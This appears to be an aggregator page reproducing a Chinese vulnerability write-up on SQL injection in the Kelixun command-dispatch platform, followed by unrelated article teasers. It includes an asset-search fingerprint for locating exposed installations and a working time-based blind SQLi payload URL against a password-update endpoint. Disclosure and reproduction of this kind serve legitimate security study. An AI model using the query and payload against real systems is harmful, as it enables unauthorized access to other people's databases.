【漏洞复现】科立讯通信指挥调度平台editemedia.php sql注入漏洞

漏洞描述

在20240318之前的福建科立讯通信指挥调度平台中发现了一个漏洞。该漏洞被归类为关键级别,影响文件/api/client/editemedia.php的未知部分。通过操纵参数number/enterprise_uuid可导致SQL注入。攻击可能会远程发起。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞集合

【传送点】上千漏洞复现复现集合 exp poc 持续更新

资产确定

body="app/structure/departments.php" || app="指挥调度管理平台"

漏洞复现

多个注入点

/api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/769108.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

瞪铃企业具备哪些特点

瞪羚企业的特点 ●【成长速度快】 凭借长板优势实现井喷式、裂变式增长。 往往依靠自身的长板特色与优势,超越一般的游戏规则、独树一帜,建立自己的王国,以超越常规的速度实现飞快成长。 ●【创新能力强】 研发原创性技术,采用…

电工职业培训初级到高级,电工技术与试题资料大全

一、资料描述 本套电工全套资料,大小1.70G,共有178个文件,PDF文件为主。 二、资料目录 01-电工技术基础知识大全 02-电工基础知识 03-电工技术 04-电工操作技术 05-电工识图 06-电工口诀 07-电工手册 08-PLC的应用 09-电工电子电气…

用eclipse创建Web项目,通过Servlet实现Web访问的功能。

要使用Eclipse和Tomcat 10创建一个简单的Web项目,并通过Servlet实现Web访问功能,你需要遵循以下详细步骤: 1. 安装和配置Eclipse和Tomcat 10 确保你已经安装了Eclipse IDE for Java EE Developers和Tomcat 10。如果还没有安装,请…

【VALL-E-01】环境搭建

本系列文章系本人知乎账号迁移 本文系个人知乎专栏文章迁移 VALL-E 网络是GPT-SOVITS很重要的参考 知乎专栏地址: 语音生成专栏 相关文章链接: 【VALL-E-01】环境搭建 【VALL-E-02】核心原理 1、环境包使用 从效果看没有GPT-SOVITS 来的好 环境安装…

python + tensorflow 开局托儿所自动点击脚本

python开局托儿所自动点击脚本 屏幕截图图片数字识别消除算法自动点击 屏幕截图 python 屏幕截图可以使用pyautogui或者PIL。我使用的是PIL中的ImageGrab(要授权)。 image ImageGrab.grab(bbox(0, 0, tool.static_window_width, tool.static_window_height)) image np.arra…

后端如何返回404地址

当我们网站输入不存在的地址,经常会出现404的页面,这是如何做到的 1.添加配置 spring:mvc:view:prefix: /templates/suffix: .html 2.resources下添加templates目录,下面放404的网站 3.添加依赖,版本在主pom里面配置好了&#x…

springboot项目学习-瑞吉外卖(3)

1.任务 实现分类管理功能数据的添加实现分类管理数据的分页查询实现分类管理数据的删除 由于前两个业务和之前的业务基本一致,所以这里就不重点介绍了,只放代码 2.分类管理功能数据的添加 前提:导入category实体类 2.1.CategoryMapper接口 //…

海外基金牌照的优势及注意事项-华媒舍

一、了解海外基金牌照 在投资领域,海外基金牌照是指投资者可以通过获得海外金融监管机构颁发的许可证,参与海外基金投资。拥有海外基金牌照的投资者可以享受更广泛的投资机会,包括跨境投资、全球资产配置等。 二、海外基金牌照的优势 多元化…

【HarmonyOS】ArkUI - 页面路由

一、概念 页面路由是指在应用程序中实现不同页面之间的跳转和数据传递。 案例:第一次使用某个购物应用,打开时肯定会是一个登录页,在登录成功以后,会跳转到首页,然后可能会去搜索,就会进入到搜索列表页&am…

茄子科技前端实习面经

需求沟通中有没有碰到什么问题,怎么解决的问项目用echarts有没有碰见什么问题vue2和vue3的区别defineproperty可以监听function和数组吗有碰见过双向数据绑定单向数据流的情况吗?父子传参父子传参有哪些vuex的理解异步数据怎么在vux怎么改vuex刷新数据会…

水下蓝牙耳机哪个好?必看4款购买单,拒绝踩雷!

在当今的科技时代,无线蓝牙耳机已经成为了我们生活中不可或缺的一部分。无论是运动、工作还是休闲娱乐,一款好的蓝牙耳机都能为我们带来极大的便利和乐趣。然而,在水下使用蓝牙耳机却是一个相对特殊的应用场景,需要考虑到防水、防…

力扣刷题Days25-45. 跳跃游戏 II(js)

目录 1,题目 2,代码 贪心算法正向查找 3,学习 解题思路 具体代码处理 数组遍历的最后边界的处理: 1,题目 给定一个长度为 n 的 0 索引整数数组 nums。初始位置为 nums[0]。 每个元素 nums[i] 表示从索引 i 向…

Nuclei Poc开发

1、Poc开发工具介绍 Nuclei:https://nuclei.projectdiscovery.io/ Cloud Platfrom云平台:https://cloud.projectdiscovery.io/ 2、目标站点简介 目标演示站点:http://glkb-jqe1.aqlab.cn/nacos/#/login 指纹:Nacos 已知常用漏洞…

日本大带宽服务器优缺点分析

日本大带宽服务器是很多用户的选择,那么日本大带宽服务器优缺点都是什么?Rak部落小编为您整理发布日本大带宽服务器优缺点分析。 日本大带宽服务器的优点主要包括高速的数据传输、亚太地区的良好覆盖、可靠性和稳定性强以及先进的硬件和光纤网络技术。 日本大带宽服…

基于springboot+vue的农产品直卖平台

博主主页:猫头鹰源码 博主简介:Java领域优质创作者、CSDN博客专家、阿里云专家博主、公司架构师、全网粉丝5万、专注Java技术领域和毕业设计项目实战,欢迎高校老师\讲师\同行交流合作 ​主要内容:毕业设计(Javaweb项目|小程序|Pyt…

20个SpringSecurity框架核心组件详解

Spring Security 是一个功能强大且灵活的身份验证和访问控制框架,在很多项目中都会采用该框架来实现权限控制功能,兄弟们在开发中需要搞清楚底层实现逻辑,或者面试时会被面试官频频追问底层源码,今天的文章,V哥总结了S…

(3)乾卦_学习笔记

大象 天行健,君子当自强不息。 健:持久的运行不息:跌倒了爬起来 从乾卦这里,先求自己。人是靠自己的,如果靠环境,那还学习干什么。一个人最了不起的,不是去控制别人,而是做一个好…

牛客竞赛语法入门班顺序结构习题(重现赛)(1031-1040)

本篇包含: 1、1031-时间转换 2、1032-温度转换 3、1033-计算机内存 4、1034-[NOIP2017]成绩 5、1035-KiKi的最高分 6、1036-组队比赛 7、1037-平方根 8、1038-长方体 9、1039-使徒袭来 10、1040-白兔的分身术 本篇包含考点: 1、小时、分钟和秒的转换 2、…

备战蓝桥杯Day35 - 动态规划 - 01背包问题

问题描述 隐含前提: 1.物体是不可分的,要么装,要么不装,不能只装一部分。 2.物体顶多使用一次。 动态规划思路 我在b站上看的闫氏dp分析大法的视频,他对dp问题做了总结归纳。 从集合的角度分析dp问题。求出有限集…

【python导入包解决方案】linux环境下python文件无法导入其他文件夹中的python文件的解决方案

出错描述 Test: │ ├─main │ main.py └─pakfunc.py如上图,我有个python项目叫Test,我的期望是pak文件夹当作自定义包,main文件夹里面是我的主程序,然后去调pak的包。现在我在main.py文件里面导入func.py里面的某个函…